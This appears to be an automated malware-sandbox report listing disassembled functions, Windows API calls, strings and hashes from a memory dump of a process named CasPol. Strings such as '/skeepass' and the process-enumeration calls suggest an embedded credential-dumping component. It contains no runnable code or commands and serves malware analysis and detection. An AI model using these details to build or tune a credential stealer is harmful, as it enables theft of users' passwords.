                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmp
                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                    • API String ID: 2081463915-1959339147
                                                                                                                    • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                    • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                    • API String ID: 2012295524-70141382
                                                                                                                    • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                    • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                    • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1700100422-0
                                                                                                                    • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                    • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                    APIs
                                                                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 552707033-0
                                                                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                    • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                    • strchr.MSVCRT ref: 0040C140
                                                                                                                    • strchr.MSVCRT ref: 0040C151
                                                                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                    • memset.MSVCRT ref: 0040C17A
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                    • String ID: 4$h
                                                                                                                    • API String ID: 4066021378-1856150674
                                                                                                                    • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                    • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                    • String ID: %%0.%df
                                                                                                                    • API String ID: 3473751417-763548558
                                                                                                                    • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                    • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                    APIs
                                                                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                    • GetParent.USER32(?), ref: 00406136
                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                    • String ID: A
                                                                                                                    • API String ID: 2892645895-3554254475
                                                                                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                    APIs
                                                                                                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                    • memset.MSVCRT ref: 0040DA23
                                                                                                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                    • String ID: caption
                                                                                                                    • API String ID: 973020956-4135340389
                                                                                                                    • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                    • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                    APIs
                                                                                                                    • wcschr.MSVCRT ref: 00413972
                                                                                                                    • wcscpy.MSVCRT ref: 00413982
                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                    • wcscpy.MSVCRT ref: 004139D1
                                                                                                                    • wcscat.MSVCRT ref: 004139DC
                                                                                                                    • memset.MSVCRT ref: 004139B8
                                                                                                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                    • memset.MSVCRT ref: 00413A00
                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                    • wcscat.MSVCRT ref: 00413A27
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                    • String ID: \systemroot
                                                                                                                    • API String ID: 4173585201-1821301763
                                                                                                                    • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                    • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                    • String ID: 0$6
                                                                                                                    • API String ID: 4066108131-3849865405
                                                                                                                    • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                    • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004082EF
                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                    • memset.MSVCRT ref: 00408362
                                                                                                                    • memset.MSVCRT ref: 00408377
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$ByteCharMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 290601579-0
                                                                                                                    • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                    • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3592753638-3916222277
                                                                                                                    • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                    • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                    • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                    • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0040A47B
                                                                                                                    • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                    • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                    • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                    • String ID: %s (%s)$YV@
                                                                                                                    • API String ID: 3979103747-598926743
                                                                                                                    • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                    • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                    • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                    • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                                    • API String ID: 2767993716-572158859
                                                                                                                    • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                    • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                    • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                    • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • database is already attached, xrefs: 0042F721
                                                                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                    • out of memory, xrefs: 0042F865
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpymemset
                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                    • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                    • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                    • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                                    • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                    APIs
                                                                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                    • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                    • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3015003838-0
                                                                                                                    • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                    • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                    • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                    • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                    APIs
